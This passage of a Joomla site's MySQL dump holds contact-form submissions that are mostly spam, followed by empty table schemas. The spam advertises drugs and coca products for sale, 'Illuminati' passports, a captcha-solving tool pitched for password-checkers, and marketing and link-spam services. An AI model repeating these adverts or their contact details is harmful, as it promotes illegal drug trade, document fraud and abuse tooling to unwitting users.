List','General'),(293,62,69,'Comment','COMMENT','Textarea','We are suppliers, dealers, sellers of Research Chemicals, Drugs, Pills, Medications Coca Seeds, Coca Plants, Coca Powder, Coca Leaves \r\n \r\nMinimum order 100€ \r\n \r\nFree shipping for order over 300€ \r\n \r\nDiscreet packaging. \r\n \r\nOvernight shipping with DHL, TNT, UPs or others tracking number \r\n \r\nWe ship worldwide. \r\n \r\nDelivery in EU 1-3 days and other countries out of EU 2-4 days. \r\n \r\nWe ship and e-mail you tracking number and shipping company name \r\n \r\nOur packaging being totally discrete and most secure, vacuum sealed and air tight, no custom problem as per shipment, totally safe purchase and MONEY BACK GUARANTEE if you are not satisfied with our quality or failure to get there. \r\n \r\n100% Customer Satisfaction Guaranteed. \r\n \r\n \r\nYour personal details are 1000% SECURE. \r\n \r\nYour orders are 1000% Secure and Anonymous. \r\n \r\n \r\nPayment: Western Union, MoneyGram, Bank Transfer, Bitcoin, Paypal Etc \r\n \r\nEmail: sales@bundesdrugsonline.com \r\nWhatsapp: +4915218246599 \r\nTele: +4915217748777 \r\nWebsite:https://bundesdrugsonline.com'),(294,63,58,'Name','NAME','Text','Eric Jones'),(295,63,64,'Email','EMAIL','Text','eric.jones.z.mail@gmail.com'),(296,63,74,'Department','DEPARTMENT','Select List','Financial Planning'),(297,63,69,'Comment','COMMENT','Textarea','Cool website!\r\n\r\nMy name’s Eric, and I just found your site - smithandsmith.co.za - while surfing the net. You showed up at the top of the search results, so I checked you out. Looks like what you’re doing is pretty cool.\r\n \r\nBut if you don’t mind me asking – after someone like me stumbles across smithandsmith.co.za, what usually happens?\r\n\r\nIs your site generating leads for your business? \r\n \r\nI’m guessing some, but I also bet you’d like more… studies show that 7 out 10 who land on a site wind up leaving without a trace.\r\n\r\nNot good.\r\n\r\nHere’s a thought – what if there was an easy way for every visitor to “raise their hand” to get a phone call from you INSTANTLY… the second they hit your site and said, “call me now.”\r\n\r\nYou can –\r\n \r\nTalk With Web Visitor is a software widget that’s works on your site, ready to capture any visitor’s Name, Email address and Phone Number. It lets you know IMMEDIATELY – so that you can talk to that lead while they’re literally looking over your site.\r\n\r\nCLICK HERE https://talkwithwebvisitors.com to try out a Live Demo with Talk With Web Visitor now to see exactly how it works.\r\n\r\nTime is money when it comes to connecting with leads – the difference between contacting someone within 5 minutes versus 30 minutes later can be huge – like 100 times better!\r\n\r\nThat’s why we built out our new SMS Text With Lead feature… because once you’ve captured the visitor’s phone number, you can automatically start a text message (SMS) conversation.\r\n \r\nThink about the possibilities – even if you don’t close a deal then and there, you can follow up with text messages for new offers, content links, even just “how you doing?” notes to build a relationship.\r\n\r\nWouldn’t that be cool?\r\n\r\nCLICK HERE https://talkwithwebvisitors.com to discover what Talk With Web Visitor can do for your business.\r\n\r\nYou could be converting up to 100X more leads today!\r\nEric\r\n\r\nPS: Talk With Web Visitor offers a FREE 14 days trial – and it even includes International Long Distance Calling. \r\nYou have customers waiting to talk with you right now… don’t keep them waiting. \r\nCLICK HERE https://talkwithwebvisitors.com to try Talk With Web Visitor now.\r\n\r\nIf you\'d like to unsubscribe click here http://talkwithwebvisitors.com/unsubscribe.aspx?d=smithandsmith.co.za\r\n'),(298,64,58,'Name','NAME','Text','Eric Jones'),(299,64,64,'Email','EMAIL','Text','eric.jones.z.mail@gmail.com'),(300,64,74,'Department','DEPARTMENT','Select List','Financial Planning'),(301,64,69,'Comment','COMMENT','Textarea','Hey, my name’s Eric and for just a second, imagine this…\r\n\r\n- Someone does a search and winds up at smithandsmith.co.za.\r\n\r\n- They hang out for a minute to check it out. “I’m interested… but… maybe…”\r\n\r\n- And then they hit the back button and check out the other search results instead. \r\n\r\n- Bottom line – you got an eyeball, but nothing else to show for it.\r\n\r\n- There they go.\r\n\r\nThis isn’t really your fault – it happens a LOT – studies show 7 out of 10 visitors to any site disappear without leaving a trace.\r\n\r\nBut you CAN fix that.\r\n\r\nTalk With Web Visitor is a software widget that’s works on your site, ready to capture any visitor’s Name, Email address and Phone Number. It lets you know right then and there – enabling you to call that lead while they’re literally looking over your site.\r\n\r\nCLICK HERE http://talkwithcustomer.com to try out a Live Demo with Talk With Web Visitor now to see exactly how it works.\r\n\r\nTime is money when it comes to connecting with leads – the difference between contacting someone within 5 minutes versus 30 minutes later can be huge – like 100 times better!\r\n\r\nPlus, now that you have their phone number, with our new SMS Text With Lead feature you can automatically start a text (SMS) conversation… so even if you don’t close a deal then, you can follow up with text messages for new offers, content links, even just “how you doing?” notes to build a relationship.\r\n\r\nStrong stuff.\r\n\r\nCLICK HERE http://talkwithcustomer.com to discover what Talk With Web Visitor can do for your business.\r\n\r\nYou could be converting up to 100X more leads today!\r\n\r\nEric\r\nPS: Talk With Web Visitor offers a FREE 14 days trial – and it even includes International Long Distance Calling. \r\nYou have customers waiting to talk with you right now… don’t keep them waiting. \r\nCLICK HERE http://talkwithcustomer.com to try Talk With Web Visitor now.\r\n\r\nIf you\'d like to unsubscribe click here http://talkwithcustomer.com/unsubscribe.aspx?d=smithandsmith.co.za\r\n'),(302,65,58,'Name','NAME','Text','LolityPef1800'),(303,65,59,'Contact Number','CONTACTNUMBER','Text','89488214647'),(304,65,64,'Email','EMAIL','Text','lolitccabSwemo6671@gmail.com'),(305,65,74,'Department','DEPARTMENT','Select List','General'),(306,65,69,'Comment','COMMENT','Textarea','XEvil - the best captcha solver tool with unlimited number of solutions, without thread number limits and highest precision! \r\nXEvil 5.0 support more than 12.000 types of image-captcha, included ReCaptcha, Google captcha, Yandex captcha, Microsoft captcha, Steam captcha, SolveMedia, ReCaptcha-2 and (YES!!!) ReCaptcha-3 too. \r\n \r\n1.) Flexibly: you can adjust logic for unstandard captchas \r\n2.) Easy: just start XEvil, press 1 button - and it\'s will automatically accept captchas from your application or script \r\n3.) Fast: 0,01 seconds for simple captchas, about 20..40 seconds for ReCaptcha-2, and about 5...8 seconds for ReCaptcha-3 \r\n \r\nYou can use XEvil with any SEO/SMM software, any parser of password-checker, any analytics application, or any custom script: \r\n XEvil support most of well-known anti-captcha services API: 2Captcha.com, RuCaptcha, AntiGate.com (Anti-Captcha), DeathByCaptcha, etc. \r\n \r\nInterested? Just search in YouTube \"XEvil\" for more info \r\nYou read this - then it works! :) \r\n \r\nhttp://xrumersale.site/ \r\n \r\nRegards, LolityPef1223'),(307,66,58,'Name','NAME','Text','Sneha Sonam'),(308,66,59,'Contact Number','CONTACTNUMBER','Text','7077060205'),(309,66,64,'Email','EMAIL','Text','siterank2@gmail.com'),(310,66,74,'Department','DEPARTMENT','Select List','General'),(311,66,69,'Comment','COMMENT','Textarea','Hello and Good Day\r\nI am Sneha Sonam Marketing Manager with a reputable online marketing company based in India.\r\nWe can fairly quickly promote your website to the top of the search rankings with no long term contracts!\r\nWe can place your website on top of the Natural Listings on Google, Yahoo and MSN. Our Search Engine Optimization team delivers more top rankings than anyone else and we can prove it. We do not use \"link farms\" or \"black hat\" methods that Google and the other search engines frown upon and can use to de-list or ban your site. The techniques are proprietary, involving some valuable closely held trade secrets.\r\nWe would be happy to send you a proposal using the top search phrases for your area of expertise. Please contact me at your convenience so we can start saving you some money.\r\nIn order for us to respond to your request for information, please include your company’s website address (mandatory) and or phone number.\r\nSo let me know if you would like me to mail you more details or schedule a call. We\'ll be pleased to serve you.\r\nI look forward to your mail.\r\nThanks and Regards\r\n'),(312,67,58,'Name','NAME','Text','Thomas Alros'),(313,67,59,'Contact Number','CONTACTNUMBER','Text','87986937288'),(314,67,64,'Email','EMAIL','Text','erythroxylum.coca.seeds@gmail.com'),(315,67,74,'Department','DEPARTMENT','Select List','General'),(316,67,69,'Comment','COMMENT','Textarea','Join the most secret society in the world. Are you a business man or woman, Politician, Musician, student etc. Do you want to be Rich, Famous, Powerful and more? Join the Illuminati brotherhood cult today. \r\nhttps://originalexpressdocuments.com/iluminatic/ \r\n \r\nJoin illuminati or take a vacation (Holidays) in any Capital city in the world of your choice.We have an Illuminati passport and others. \r\nhttps://originalexpressdocuments.com/product-category/real-passport/'),(322,69,58,'Name','NAME','Text','Bobbyhix'),(323,69,59,'Contact Number','CONTACTNUMBER','Text','82366242968'),(324,69,64,'Email','EMAIL','Text','padalexivan@gmail.com'),(325,69,74,'Department','DEPARTMENT','Select List','General'),(326,69,69,'Comment','COMMENT','Textarea','<a href=\"https://vk.com/kupludom24\" />Продам дом Красноярск \r\n'),(327,70,58,'Name','NAME','Text','Sardaw'),(328,70,59,'Contact Number','CONTACTNUMBER','Text','88943343625'),(329,70,64,'Email','EMAIL','Text','hasikra@yandex.ru'),(330,70,74,'Department','DEPARTMENT','Select List','General'),(331,70,69,'Comment','COMMENT','Textarea','Стабильные <a href=\"https://proxyspace.seo-hunter.com/mobile-proxies/kazan/\"> мобильные прокси для работы с социальными сетями </a> динамические'),(332,71,58,'Name','NAME','Text','KathrynKaf'),(333,71,59,'Contact Number','CONTACTNUMBER','Text','продажа тугоплавких металлов'),(334,71,64,'Email','EMAIL','Text','alexpopov716253@gmail.com'),(335,71,74,'Department','DEPARTMENT','Select List','General'),(336,71,69,'Comment','COMMENT','Textarea','Приглашаем Ваше предприятие к взаимовыгодному сотрудничеству в направлении производства и поставки <a href=\"https://redmetsplav.ru/store/volfram/splavy-volframa-1/volfram-evch-1/provoloka-volframovaya-evch/\">Проволока вольфрамовая ЭВЧ</a>. \r\n- Поставка тугоплавких и жаропрочных сплавов на основе (молибдена, вольфрама, тантала, ниобия, титана, циркония, висмута, ванадия, никеля, кобальта); \r\n- Поставка порошков, и оксидов \r\n- Поставка изделий производственно-технического назначения пруток, лист, проволока, сетка, тигли, квадрат, экран, нагреватель) штабик, фольга, контакты, втулка, опора, поддоны, затравкодержатели, формообразователи, диски, провод, обруч, электрод, детали,пластина, полоса, рифлёная пластина, лодочка, блины, бруски, чаши, диски, труба. \r\n- Любые типоразмеры, изготовление по чертежам и спецификациям заказчика. \r\n- Поставка изделий из сплавов: \r\n \r\n<a href=\"http://yafeiml.awardspace.us/viewthread.php?tid=2340464&pid=2646350&page=1&extra=#pid2646350\">Поковка ХН28ВМАБ</a>\r\n<a href=\"http://downza.com.cn/web/viewtopic.php?p=30970#30970\">Проволока вольфрамовая ВАМ-5</a>\r\n<a href=\"https://www.mircforumlari.com/forum-kurallari/1347-so-happens-17.html#post3074\">Полоса вольфрамовая ВЧ-С</a>\r\n<a href=\"http://mmoiseev.ru/blog/lechenie-skolioza/#comment224\">48НХ</a>\r\n<a href=\"http://haazenfoos.paradisefounduo.com/entry.php?129-dryroivionfile-xltyd&bt=55075\">Труба молибденовая Ш-Мч</a>\r\n 29b91e0 '),(337,72,58,'Name','NAME','Text','Donaldsuf'),(338,72,59,'Contact Number','CONTACTNUMBER','Text','83213777654'),(339,72,64,'Email','EMAIL','Text','user.z.al.e.v.s.k.i.ja.22201@gmail.com\r\n'),(340,72,74,'Department','DEPARTMENT','Select List','General'),(341,72,69,'Comment','COMMENT','Textarea','Доброго времени суток друзья \r\nWhere is administration? \r\nIt is about advertisement on your website. \r\nThank. \r\n<a href=\"https://burtehservice.by/\">плиткорез stayer 3303</a>\r\n');
/*!40000 ALTER TABLE `vzx9b_facileforms_subrecords` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_fields`
--
DROP TABLE IF EXISTS `vzx9b_fields`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_fields` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0,
`context` varchar(255) NOT NULL DEFAULT '',
`group_id` int(10) unsigned NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`label` varchar(255) NOT NULL DEFAULT '',
`default_value` text DEFAULT NULL,
`type` varchar(255) NOT NULL DEFAULT 'text',
`note` varchar(255) NOT NULL DEFAULT '',
`description` text NOT NULL,
`state` tinyint(1) NOT NULL DEFAULT 0,
`required` tinyint(1) NOT NULL DEFAULT 0,
`checked_out` int(11) NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) NOT NULL DEFAULT 0,
`params` text NOT NULL,
`fieldparams` text NOT NULL,
`language` char(7) NOT NULL DEFAULT '',
`created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`access` int(11) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_state` (`state`),
KEY `idx_created_user_id` (`created_user_id`),
KEY `idx_access` (`access`),
KEY `idx_context` (`context`(191)),
KEY `idx_language` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_fields`
--
LOCK TABLES `vzx9b_fields` WRITE;
/*!40000 ALTER TABLE `vzx9b_fields` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_fields` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_fields_categories`
--
DROP TABLE IF EXISTS `vzx9b_fields_categories`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_fields_categories` (
`field_id` int(11) NOT NULL DEFAULT 0,
`category_id` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`field_id`,`category_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_fields_categories`
--
LOCK TABLES `vzx9b_fields_categories` WRITE;
/*!40000 ALTER TABLE `vzx9b_fields_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_fields_categories` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_fields_groups`
--
DROP TABLE IF EXISTS `vzx9b_fields_groups`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_fields_groups` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0,
`context` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`note` varchar(255) NOT NULL DEFAULT '',
`description` text NOT NULL,
`state` tinyint(1) NOT NULL DEFAULT 0,
`checked_out` int(11) NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) NOT NULL DEFAULT 0,
`params` text NOT NULL,
`language` char(7) NOT NULL DEFAULT '',
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`access` int(11) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_state` (`state`),
KEY `idx_created_by` (`created_by`),
KEY `idx_access` (`access`),
KEY `idx_context` (`context`(191)),
KEY `idx_language` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_fields_groups`
--
LOCK TABLES `vzx9b_fields_groups` WRITE;
/*!40000 ALTER TABLE `vzx9b_fields_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_fields_groups` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_fields_values`
--
DROP TABLE IF EXISTS `vzx9b_fields_values`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_fields_values` (
`field_id` int(10) unsigned NOT NULL,
`item_id` varchar(255) NOT NULL COMMENT 'Allow references to items which have strings as ids, eg. none db systems.',
`value` text DEFAULT NULL,
KEY `idx_field_id` (`field_id`),
KEY `idx_item_id` (`item_id`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_fields_values`
--
LOCK TABLES `vzx9b_fields_values` WRITE;
/*!40000 ALTER TABLE `vzx9b_fields_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_fields_values` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_filters`
--
DROP TABLE IF EXISTS `vzx9b_finder_filters`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_filters` (
`filter_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`alias` varchar(255) NOT NULL,
`state` tinyint(1) NOT NULL DEFAULT 1,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL,
`created_by_alias` varchar(255) NOT NULL,
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`map_count` int(10) unsigned NOT NULL DEFAULT 0,
`data` text NOT NULL,
`params` mediumtext DEFAULT NULL,
PRIMARY KEY (`filter_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_filters`
--
LOCK TABLES `vzx9b_finder_filters` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_filters` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_filters` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links`
--
DROP TABLE IF EXISTS `vzx9b_finder_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links` (
`link_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`url` varchar(255) NOT NULL,
`route` varchar(255) NOT NULL,
`title` varchar(400) DEFAULT NULL,
`description` text DEFAULT NULL,
`indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`md5sum` varchar(32) DEFAULT NULL,
`published` tinyint(1) NOT NULL DEFAULT 1,
`state` int(5) DEFAULT 1,
`access` int(5) DEFAULT 0,
`language` varchar(8) NOT NULL,
`publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`list_price` double unsigned NOT NULL DEFAULT 0,
`sale_price` double unsigned NOT NULL DEFAULT 0,
`type_id` int(11) NOT NULL,
`object` mediumblob NOT NULL,
PRIMARY KEY (`link_id`),
KEY `idx_type` (`type_id`),
KEY `idx_title` (`title`(100)),
KEY `idx_md5` (`md5sum`),
KEY `idx_url` (`url`(75)),
KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`),
KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links`
--
LOCK TABLES `vzx9b_finder_links` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms0`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms0`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms0` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms0`
--
LOCK TABLES `vzx9b_finder_links_terms0` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms0` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms0` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms1`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms1`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms1` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms1`
--
LOCK TABLES `vzx9b_finder_links_terms1` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms1` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms1` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms2`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms2`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms2` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms2`
--
LOCK TABLES `vzx9b_finder_links_terms2` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms2` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms2` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms3`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms3`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms3` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms3`
--
LOCK TABLES `vzx9b_finder_links_terms3` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms3` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms3` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms4`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms4`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms4` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms4`
--
LOCK TABLES `vzx9b_finder_links_terms4` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms4` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms4` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms5`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms5`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms5` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms5`
--
LOCK TABLES `vzx9b_finder_links_terms5` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms5` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms5` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms6`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms6`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms6` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms6`
--
LOCK TABLES `vzx9b_finder_links_terms6` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms6` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms6` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms7`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms7`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms7` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms7`
--
LOCK TABLES `vzx9b_finder_links_terms7` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms7` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms7` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms8`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms8`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms8` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms8`
--
LOCK TABLES `vzx9b_finder_links_terms8` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms8` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms8` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_terms9`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_terms9`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_terms9` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
